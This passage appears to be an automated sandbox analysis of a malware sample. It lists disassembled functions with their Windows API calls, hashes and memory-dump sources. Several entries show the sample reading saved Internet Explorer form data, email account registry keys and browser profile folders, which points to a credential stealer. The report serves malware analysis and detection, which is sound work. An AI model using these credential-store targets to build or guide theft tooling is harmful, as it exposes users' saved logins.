                                                          • Instruction ID: ea8cc078adf594246979f4d9b8e8515c456ccfeccd2e57d1ecf10cbe152b8ac0
                                                          • Opcode Fuzzy Hash: 23c3742646c604ffa098561bd5fed471053c739b9a8a755a54060249d9b07da3
                                                          • Instruction Fuzzy Hash: 79B147319246969FDB26CF28C892FAEBBE5EF55340F1442AEE845DB342D7348D11CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D64BE, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 002D658E
                                                          • _free.LIBCMT ref: 002D65B7
                                                          • SetEndOfFile.KERNEL32(00000000,002D3D8C,00000000,002CA589,?,?,?,?,?,?,?,002D3D8C,002CA589,00000000), ref: 002D65E9
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,002D3D8C,002CA589,00000000,?,?,?,?,00000000), ref: 002D6605
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1547350101-0
                                                          • Opcode ID: bd6b472504d7cd2373c8f79e794a749f2d9fa00933b8eb16af13765dc06c8874
                                                          • Instruction ID: 4815a229377c5c5f037a55b24b4c005e53cd8162adb43b6fc54e5ec840928ee6
                                                          • Opcode Fuzzy Hash: bd6b472504d7cd2373c8f79e794a749f2d9fa00933b8eb16af13765dc06c8874
                                                          • Instruction Fuzzy Hash: 204128729206029ADB11AFA8DC4AB9D37B9EF44360F240216F524E7395E774DCB48F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046626E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 0046633E
                                                          • _free.LIBCMT ref: 00466367
                                                          • SetEndOfFile.KERNEL32(00000000,00463B3C,00000000,0045A339,?,?,?,?,?,?,?,00463B3C,0045A339,00000000), ref: 00466399
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00463B3C,0045A339,00000000,?,?,?,?,00000000), ref: 004663B5
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID:
                                                          • API String ID: 1547350101-0
                                                          • Opcode ID: 55ba9db9b14ef6d94ac9bdf144e99a68f627fc1795f8605ad56ed000fcb662c6
                                                          • Instruction ID: a84e0b44c514cfbf4844101f69372ed19516815929fa4c50a6dad60ee0f25fc8
                                                          • Opcode Fuzzy Hash: 55ba9db9b14ef6d94ac9bdf144e99a68f627fc1795f8605ad56ed000fcb662c6
                                                          • Instruction Fuzzy Hash: F141D6729006049ADB11AFAACC46A9E77B9EF45324F16011BFC14E7392F73CCC94876A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A43A0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 102stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002A3B53: LoadLibraryA.KERNEL32(?), ref: 002A3B92
                                                            • Part of subcall function 002A3B53: GetProcAddress.KERNEL32(00000000,?), ref: 002A3BCD
                                                            • Part of subcall function 002A3B53: FreeLibrary.KERNEL32(00000000), ref: 002A3C01
                                                            • Part of subcall function 002A3FAD: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A3FD2
                                                            • Part of subcall function 002A3FAD: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A4063
                                                            • Part of subcall function 002A3FAD: RegCloseKey.ADVAPI32(?), ref: 002A4070
                                                            • Part of subcall function 002A407A: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002A40A1
                                                            • Part of subcall function 002A407A: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 002A40CC
                                                            • Part of subcall function 002A407A: lstrlenW.KERNEL32(?), ref: 002A40E3
                                                            • Part of subcall function 002A407A: lstrlenW.KERNEL32(?), ref: 002A40F0
                                                            • Part of subcall function 002A407A: lstrcpyW.KERNEL32(00000000,?), ref: 002A4111
                                                            • Part of subcall function 002A407A: lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A411D
                                                            • Part of subcall function 002A407A: lstrcatW.KERNEL32(00000000,?), ref: 002A412B
                                                            • Part of subcall function 002A407A: lstrcatW.KERNEL32(00000000,?), ref: 002A4137
                                                            • Part of subcall function 002A407A: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 002A4171
                                                            • Part of subcall function 002A407A: RegCloseKey.ADVAPI32(?), ref: 002A4186
                                                            • Part of subcall function 002A497B: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 002A49C3
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 002A49E2
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 002A4A1D
                                                            • Part of subcall function 002A497B: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 002A4A3E
                                                          • lstrlenW.KERNEL32(00000000), ref: 002A4402
                                                          • lstrcpyW.KERNEL32(00000000,00000000), ref: 002A441A
                                                          • lstrcpyW.KERNEL32(00000000,0047E090), ref: 002A4426
                                                            • Part of subcall function 002A3FAD: lstrlenW.KERNEL32(?), ref: 002A3FF8
                                                            • Part of subcall function 002A3FAD: lstrcpyW.KERNEL32(00000000,?), ref: 002A4015
                                                            • Part of subcall function 002A3FAD: lstrcatW.KERNEL32(00000000,0047DE0C), ref: 002A4021
                                                            • Part of subcall function 002A3FAD: lstrcatW.KERNEL32(00000000,?), ref: 002A402F
                                                            • Part of subcall function 002B56E1: _free.LIBCMT ref: 002B56F4
                                                          Strings
                                                          • Software\Microsoft\Internet Account Manager, xrefs: 002A43E8
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                                                          • String ID: Software\Microsoft\Internet Account Manager
                                                          • API String ID: 527226083-3091610973
                                                          • Opcode ID: 78a14d73dddb44db1bb56b23b62298a767081722b52ad043ac5de44d37292e4b
                                                          • Instruction ID: 897186718b8295fb9c26222876718240be18f448f90fdb67f96d56bba184f889
                                                          • Opcode Fuzzy Hash: 78a14d73dddb44db1bb56b23b62298a767081722b52ad043ac5de44d37292e4b
                                                          • Instruction Fuzzy Hash: 56319E71520208FFD718FBA0CD97EEE73ACEA55348B604499F10612192AFF85F14AE26
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002CF3BF, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 002C1214: _free.LIBCMT ref: 002C1222
                                                            • Part of subcall function 002CA7DE: WideCharToMultiByte.KERNEL32(?,00000000,002C24AB,00000000,00000000,00000000,00000000,00000000,?,00000000,002C24AB,?,002CD934,?,00000000,00000000), ref: 002CA880
                                                          • GetLastError.KERNEL32 ref: 002CF427
                                                          • __dosmaperr.LIBCMT ref: 002CF42E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 002CF46D
                                                          • __dosmaperr.LIBCMT ref: 002CF474
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                          • String ID:
                                                          • API String ID: 167067550-0
                                                          • Opcode ID: 7784710d1c769099d17c07dd495e47e3d0c1d95db60d0e20e3d507e8cd2d4b71
                                                          • Instruction ID: 826c13cd9fb37918ffc2c128e6e4f540365862756013ffdfb04875a710b77b8c
                                                          • Opcode Fuzzy Hash: 7784710d1c769099d17c07dd495e47e3d0c1d95db60d0e20e3d507e8cd2d4b71
                                                          • Instruction Fuzzy Hash: DA210671620246BF9B75AF658D81E6BB7AEEF043A4710873CFA19C3140D770DC608BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C1113, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25c64e27298a3129335edc31cfa098b02863a77cc223d4883c7f44f26c479602
                                                          • Instruction ID: 78621ff848d4981c8ef492b2c8a0e1b020c18236f3b81c1e3d2c4137e2b2ba1b
                                                          • Opcode Fuzzy Hash: 25c64e27298a3129335edc31cfa098b02863a77cc223d4883c7f44f26c479602
                                                          • Instruction Fuzzy Hash: 5E21D771620206BFDB21AF619C82E6A77ADAF023A47144718FA1DD7542E7B4DC708B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C8424, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e7d37b9331b9543c1e382c5bc9fd50b3d347fcbd3c11ad225270803f898bb3dd
                                                          • Instruction ID: dd9d45a5b6a3c872629d176980fb283ffe5b64ad3574cc48750b6bab9a90a51c
                                                          • Opcode Fuzzy Hash: e7d37b9331b9543c1e382c5bc9fd50b3d347fcbd3c11ad225270803f898bb3dd
                                                          • Instruction Fuzzy Hash: 2921EB32A21227ABCB359F64DC44F6B3754AF41770F21836AEC55A7291EE70EC10C6E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A4A6E, Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,0046C15C), ref: 002A4A9F
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4ABE
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 002A4AE1
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0047913B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4B0D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3705784190-0
                                                          • Opcode ID: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction ID: 095bfa6b95eac4398d943cb20bf48dded8a0b9dedfcbbdf232b6ea72af7facf4
                                                          • Opcode Fuzzy Hash: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction Fuzzy Hash: A4215E75920105EFEB19AFA4CC0AABABAF9EF45300F14456DF881D6251EAF09D50DA60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0043481E, Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,766F16D0), ref: 0043484F
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,766F16D0), ref: 0043486E
                                                          • lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,766F16D0), ref: 00434891
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0047913B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,766F16D0), ref: 004348BD
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$lstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3705784190-0
                                                          • Opcode ID: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction ID: 079fede5dd8a1393d2bf171b5c0c9ffbabc7043523810679e0d0781d5f2f939d
                                                          • Opcode Fuzzy Hash: 8f7554a61649c7f9861242b84d103f9e3e1b15cead943f3b81e6ebb4c6593c23
                                                          • Instruction Fuzzy Hash: 9C216279904144FFEB19AFA4CC0AABE7BF9EF49300F14446EF881D6290EAB46D40DB15
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00289A8E, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32 ref: 00289AA3
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00289AB1
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00289B34
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00289B48
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AttributesCreateDirectoryFile
                                                          • String ID:
                                                          • API String ID: 3401506121-0
                                                          • Opcode ID: f33c47d20e542b380e00c2b1616ea1288c2929b91129d726bc22baba614b6fb4
                                                          • Instruction ID: a33740f2c36c12fe4b3faab0b7ce070dd99231620b9c282c72c42475edbc4786
                                                          • Opcode Fuzzy Hash: f33c47d20e542b380e00c2b1616ea1288c2929b91129d726bc22baba614b6fb4
                                                          • Instruction Fuzzy Hash: 9611663991531506CF30AA78ACC8BFA7B2C9B92324F1802A6E591931C2DAB04DC58F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00289A8F, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32 ref: 00289AA3
                                                          • CreateDirectoryA.KERNEL32(?,00000000), ref: 00289AB1
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00289B34
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00289B48
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: AttributesCreateDirectoryFile
                                                          • String ID:
                                                          • API String ID: 3401506121-0
                                                          • Opcode ID: 07874c2c5db0f0d7649794541f3ae0f3d67c95f63020bece240bfe92d6db95ad
                                                          • Instruction ID: 77b030371122f9b10e15126e9a59c7227bea858ec0ac30d9599f3c4ff67b7e11
                                                          • Opcode Fuzzy Hash: 07874c2c5db0f0d7649794541f3ae0f3d67c95f63020bece240bfe92d6db95ad
                                                          • Instruction Fuzzy Hash: E311893990131907CB30AA78ACC8BFA772C9B92324F1801A6F591931C2DAB04DC58F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C6E7B, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,?,002B47A1,00000000,00000000,?,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6E80
                                                          • _free.LIBCMT ref: 002C6EDD
                                                          • _free.LIBCMT ref: 002C6F13
                                                          • SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002C0C4C,00000000,00000000,00000000,00000000,?), ref: 002C6F1E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 56d4617065c99d710c47ab60d15a40fed92ae370a49908268d4dcf848c9edfb9
                                                          • Instruction ID: ffef80c9bab27c2e386496f08e5fe234d7ba428388917a8c9583ad6504c1b4bf
                                                          • Opcode Fuzzy Hash: 56d4617065c99d710c47ab60d15a40fed92ae370a49908268d4dcf848c9edfb9
                                                          • Instruction Fuzzy Hash: 0A11C6362342026ADB112BB4ECCDF3B255A8BC0770735073DF524821D2EE768C264B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A7FDE, Relevance: 6.1, APIs: 4, Instructions: 71processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A8013
                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 002A809E
                                                          • CloseHandle.KERNEL32(?), ref: 002A80A7
                                                          • CloseHandle.KERNEL32(?), ref: 002A80B0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: CloseHandle$CreateFileModuleNameProcess
                                                          • String ID:
                                                          • API String ID: 2820832629-0
                                                          • Opcode ID: 93049b2ec94249f70398235c3c7f643914566fafc4cb7df908e11e522aee71df
                                                          • Instruction ID: 36bc3636612c64e239f3d4524e66a1e3d12617bd53ec5f28c2794c588c91cc5c
                                                          • Opcode Fuzzy Hash: 93049b2ec94249f70398235c3c7f643914566fafc4cb7df908e11e522aee71df
                                                          • Instruction Fuzzy Hash: 1D218072D1024CBFEB019BA4DC81EEEB77CEF59304F005166F649A1022EAB15A998B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002C6FD2, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(002AE5FD,002AE5FD,00000002,002BB629,002C8E81,00000000,?,002B09CE,00000002,00000000,?,00488A38,?,00277326,002AE5FD,00000004), ref: 002C6FD7
                                                          • _free.LIBCMT ref: 002C7034
                                                          • _free.LIBCMT ref: 002C706A
                                                          • SetLastError.KERNEL32(00000000,004881C8,000000FF,?,002B09CE,00000002,00000000,?,00488A38,?,00277326,002AE5FD,00000004,00000000,00000000,00000000), ref: 002C7075
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: de0d3701084fd28141a2aea1eb4363a550953f279465bd81b3576be3263771e2
                                                          • Instruction ID: 4e4240b3ae10eea8c3be9032ddcd2413437caa906dc13caf9d7fa57d6e438266
                                                          • Opcode Fuzzy Hash: de0d3701084fd28141a2aea1eb4363a550953f279465bd81b3576be3263771e2
                                                          • Instruction Fuzzy Hash: 3D1108362386027AD72167786CC9F3B215B8BC17B5B35073DF528821E1EE728C268F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002B4272, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa141df59e281e09356cae7e398c67eb6676a4416c05ad27f71246e0624b72e3
                                                          • Instruction ID: dd3927f8e94a170bae62d4346bbf6da95437dfeae3e365942338ca1b20a59881
                                                          • Opcode Fuzzy Hash: aa141df59e281e09356cae7e398c67eb6676a4416c05ad27f71246e0624b72e3
                                                          • Instruction Fuzzy Hash: C1119631E21222ABCB21AF649CC4BBE77949F017E0B240265FC55A7292D770ED1096D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002A4F9A, Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: c7e06f8c33b4a97e2c567af3d80804fec5ec7ba31e2a5a6f3d57ecdfd1b8fd00
                                                          • Instruction ID: 42674a2b69f0523c63c5ab04b46da5efb3b91db0f6d3c5a089a3bc7ca7990637
                                                          • Opcode Fuzzy Hash: c7e06f8c33b4a97e2c567af3d80804fec5ec7ba31e2a5a6f3d57ecdfd1b8fd00
                                                          • Instruction Fuzzy Hash: 5F01F9325122056FCF21FF58CC819EA7768DFC53903544419FD0897202EB70EE258BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004349AC, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00020008,?), ref: 004349C4
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004349CB
                                                          • GetUserProfileDirectoryA.USERENV(?,?,00000200), ref: 004349DD
                                                          • CloseHandle.KERNEL32(?), ref: 004349EA
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Process$CloseCurrentDirectoryHandleOpenProfileTokenUser
                                                          • String ID:
                                                          • API String ID: 1246687928-0
                                                          • Opcode ID: 7efd7ff150a9593777827fae617af71caa979b80934f4d148253df16b0b2ac34
                                                          • Instruction ID: 52929cc94302e98cbf51ad757ca836855f6015a6f755d450344f277f0a293595
                                                          • Opcode Fuzzy Hash: 7efd7ff150a9593777827fae617af71caa979b80934f4d148253df16b0b2ac34
                                                          • Instruction Fuzzy Hash: DEF01CB2610208BBEB109BB1DC89EEB7AACEF45251F100165E842E1111E6B4EE009A69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002D63BB, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002D63D2
                                                          • GetLastError.KERNEL32(?,002D30CF,00000000,00000001,00000000,00000000,?,002C761B,00000000,002B5405,00000000,00000000,00000000,?,002C7B6F,00000000), ref: 002D63DE
                                                            • Part of subcall function 002D63A4: CloseHandle.KERNEL32(00488960), ref: 002D63B4
                                                          • ___initconout.LIBCMT ref: 002D63EE
                                                            • Part of subcall function 002D6366: CreateFileW.KERNEL32(00478770,40000000,00000003,00000000,00000003,00000000,00000000), ref: 002D6379
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000), ref: 002D6403
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction ID: a510fe587eba8f53c25852aac4f2a5520c61ce78a74d20d9fd98e02d2fca20c8
                                                          • Opcode Fuzzy Hash: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction Fuzzy Hash: F4F03036411169BFCF225FD1DC489AD3F66FF097A0B114065FA18A6231DA328C309FD6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0046616B, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteConsoleW.KERNEL32 ref: 00466182
                                                          • GetLastError.KERNEL32(?,00462E7F,00000000,00000001,00000000,00000000,?,004573CB,00000000,004451B5,00000000,00000000,00000000,?,0045791F,00000000), ref: 0046618E
                                                            • Part of subcall function 00466154: CloseHandle.KERNEL32(FFFFFFFE), ref: 00466164
                                                          • ___initconout.LIBCMT ref: 0046619E
                                                            • Part of subcall function 00466116: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00466129
                                                          • WriteConsoleW.KERNEL32 ref: 004661B3
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction ID: 416dec9891203dc22651b9c7fb9a390e156cc2fca5e1046b62f2555eaa9ceec2
                                                          • Opcode Fuzzy Hash: d2a14a4d4d8a0431a7d46cfe457be35950f5a935016e106225a78b7c3e638dff
                                                          • Instruction Fuzzy Hash: 93F03736401159BFCF221FD1DC44DDE3F66FB053A0B054065F918A5132EA328820DBDA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00454592, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 0045459B
                                                            • Part of subcall function 00457A43: HeapFree.KERNEL32(00000000,00000000), ref: 00457A59
                                                            • Part of subcall function 00457A43: GetLastError.KERNEL32(?,?,00460E6B,?,00000000,?,00000002,?,0046110E,?,00000007,?,?,0046150F,?,?), ref: 00457A6B
                                                          • _free.LIBCMT ref: 004545AE
                                                          • _free.LIBCMT ref: 004545BF
                                                          • _free.LIBCMT ref: 004545D0
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 2d59d81cd91aaabaf7c61607a25b77a9840330caacce95767aa868d436f6aa2b
                                                          • Instruction ID: d34e820f9dbc65aeedc8de5f007f3b93472046a6ea2c1d17c7705522547cb9d1
                                                          • Opcode Fuzzy Hash: 2d59d81cd91aaabaf7c61607a25b77a9840330caacce95767aa868d436f6aa2b
                                                          • Instruction Fuzzy Hash: B2E012B08849209AC602BF11FC8280D3EA3B744792301183FF81022636D73A1B129BFE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0028BE8D, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 439COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028BE92
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0028BEB6
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 0027902D: ___std_fs_copy_file@12.LIBCPMT ref: 00279051
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$EnvironmentFolderPathVariable___std_fs_copy_file@12
                                                          • String ID: Profiles
                                                          • API String ID: 1143926492-1917249382
                                                          • Opcode ID: c438b8f4c4a1e1c9b0ea96f74d51132b4d46cb51398e37a1eb8dea193f456627
                                                          • Instruction ID: 88f9c6d7eac14935461e4f248697e91669fa43b0116a501ee1126a405493ce50
                                                          • Opcode Fuzzy Hash: c438b8f4c4a1e1c9b0ea96f74d51132b4d46cb51398e37a1eb8dea193f456627
                                                          • Instruction Fuzzy Hash: B112BC30D14299CBEB24EBA4CD51AEDBBB1AF59300F1081E9D44977292EB741F89CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002BF679, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 274COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: __aulldvrm
                                                          • String ID: +$-
                                                          • API String ID: 1302938615-2137968064
                                                          • Opcode ID: 205cf7303c31d86affebaf3409f2cff2bbf7ea08e5b3866b122cf33e1d294320
                                                          • Instruction ID: 3947236a7b8f7cb9e32ecd65b9b12fb57c6a728788c204b7d2e78266273464a2
                                                          • Opcode Fuzzy Hash: 205cf7303c31d86affebaf3409f2cff2bbf7ea08e5b3866b122cf33e1d294320
